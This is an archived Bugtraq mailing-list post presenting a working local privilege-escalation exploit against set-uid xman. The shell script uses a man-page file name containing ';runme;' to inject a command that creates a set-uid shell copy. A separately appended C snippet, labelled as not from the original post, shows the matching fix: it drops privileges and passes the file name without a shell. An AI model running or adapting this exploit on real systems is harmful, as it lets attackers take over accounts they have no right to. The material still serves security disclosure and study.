Bugtraq mailing list archives
xman (suid) exploit, made easier.
From: <v9 () realhalo org>
Date: 17 Jul 2001 20:28:08 -0000
xman doesn't drop privileges anywheres in the program. but, does support suid installation. so, exploiting via a system call is much easier than the buffer overflow in MANPATH, mentioned in another bugtraq posting. here is an example of such an exploitation possibility:

-- xxman.sh --
#!/bin/sh
# example of xman exploitation. xman
# supports privileges. but, never
# drops them.
# Vade79 -> v9 () realhalo org -> realhalo.org.
MANPATH=~/xmantest/
mkdir -p ~/xmantest/man1
cd ~/xmantest/man1
touch ';runme;.1'
cat << EOF >~/xmantest/runme
#!/bin/sh
cp /bin/sh ~/xmansh
chown `id -u` ~/xmansh
chmod 4755 ~/xmansh
EOF
chmod 755 ~/xmantest/runme
echo "click the ';runme;' selection," \
"exit. then, check for ~/xmansh."
xman -bothshown -notopbox
rm -rf ~/xmantest
-- xxman.sh --

Vade79 -> v9 () realhalo org -> realhalo.org.
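The two fixes the post implies for a set-id program, as an added example that is not from the original post and is not xman's code: give up privileges permanently before running a helper, and pass the file name as a single argv element instead of through a shell. The function names `drop_privileges` and `run_without_shell` are hypothetical, and the `--` argument assumes the helper honors the usual end-of-options convention.

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: permanently give up set-id privileges.
 * Returns 0 on success, -1 on failure. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    if (setgid(rgid) != 0 || setuid(ruid) != 0)   /* group first, then user */
        return -1;
    if (ruid != 0 && setuid(0) == 0)              /* the drop must not be reversible */
        return -1;
    return (geteuid() == ruid && getegid() == rgid) ? 0 : -1;
}

/* Hypothetical helper: run `prog -- path` with no shell involved. The file
 * name is one argv element, so ';' and similar characters are never parsed
 * as command separators. Returns the child's exit status, or -1 on error. */
int run_without_shell(const char *prog, const char *path)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges() != 0)   /* never exec a helper while privileged */
            _exit(126);
        execl(prog, prog, "--", path, (char *)NULL);
        _exit(127);                   /* exec itself failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* File name taken from the post; here it is only ever an argument to ls. */
    int rc = run_without_shell("/bin/ls", ";runme;.1");
    printf("child exit status: %d\n", rc);
    return drop_privileges() == 0 ? 0 : 1;
}
```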
